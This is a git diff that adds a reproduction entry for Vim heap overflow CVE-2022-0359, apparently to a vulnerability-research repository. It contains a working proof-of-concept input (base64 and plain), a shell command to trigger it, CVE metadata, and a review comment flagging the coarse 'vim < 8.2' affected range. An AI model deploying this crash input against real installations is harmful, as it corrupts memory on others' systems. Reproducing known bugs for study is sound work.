diff --git a/cve/vim/2022/CVE-2022-0359/README.md b/cve/vim/2022/CVE-2022-0359/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..68534a6d29100041aab522171c20418268d63e6b
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-0359/README.md
@@ -0,0 +1,7 @@
+### 漏洞复现
+```shell
+echo -n cmV0ODAwCnMvXHYvCQpzZSBhaQpzaWwwbm9ybTppDQ== | base64 -d > heap_ow_poc1
+vim -u NONE -i NONE -n -X -Z -e -m -s -S heap_ow_poc1 -c :qa!
+```
+![](./png/CVE-2022-0359.png)
+
diff --git a/cve/vim/2022/CVE-2022-0359/heap_ow_poc1 b/cve/vim/2022/CVE-2022-0359/heap_ow_poc1
new file mode 100644
index 0000000000000000000000000000000000000000..44b8b065a3298ca6e0ada83e22f1c0103eb283e2
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-0359/heap_ow_poc1
@@ -0,0 +1,4 @@
+ret800
+s/\v/
+se ai
+sil0norm:i
\ No newline at end of file
diff --git a/cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png b/cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png
new file mode 100644
index 0000000000000000000000000000000000000000..42b5dbfd04b9444dce5260f8bf4f99e5569eda28
Binary files /dev/null and b/cve/vim/2022/CVE-2022-0359/png/CVE-2022-0359.png differ
diff --git a/cve/vim/2022/yaml/CVE-2022-0359.yaml b/cve/vim/2022/yaml/CVE-2022-0359.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..63ba211001dc9173e3a41d950b49233f2913d6dc
--- /dev/null
+++ b/cve/vim/2022/yaml/CVE-2022-0359.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-0359
+source: https://huntr.dev/bounties/a3192d90-4f82-4a67-b7a6-37046cc88def/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: high
+ description: |
+ vim 存在安全漏洞,该漏洞源于在8.2之前的vim中基于堆的缓冲区溢出。
+ scope-of-influence:
+ vim < 8.2
+ reference:
+ - https://github.com/vim/vim/commit/85b6747abc15a7a81086db31289cf1b8b17e6cb1
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0359
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2022-0359
+ cwe-id: CWE-787,CWE-122
+ cnvd-id: None
+ kve-id: None
+ tags: 缓冲区溢出,cve2022
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 2f4ff9eefc62108d512ab53f150a411cf9ad1318..d5c6b05c8c710e9f031e6616528c057570a5fc6c 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -22,8 +22,10 @@ cve:
 polkit:
 - CVE-2021-4034
 vim:
- - CVE-2022-0729
+ - CVE-2022-0359
 - CVE-2022-0629
+ - CVE-2022-0729
+
 cnvd:
 kve:
 kylin-software-properties:
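Review bot: In cve/vim/2022/yaml/CVE-2022-0359.yaml the affected range `vim < 8.2` under `scope-of-influence`, and the matching wording in `description`, looks too coarse for scoping. Vim 8.2 is a release line with many patch levels, and the fix is the single upstream commit listed under `reference`; if that commit landed as a patch inside the 8.2 series, 8.2 builds without it are still affected while this record reports them as safe. State the first fixed patch level taken from that commit, in the form `vim < 8.2.<PATCH>`, so that inventory checks against this record do not miss vulnerable 8.2 installs. Separately, `name` describes the product rather than the vulnerability and should name the heap-based buffer overflow. `cnvd-id: None` and `kve-id: None` load as the string "None" in YAML, so `null` or an empty value is safer unless the consumer expects that literal.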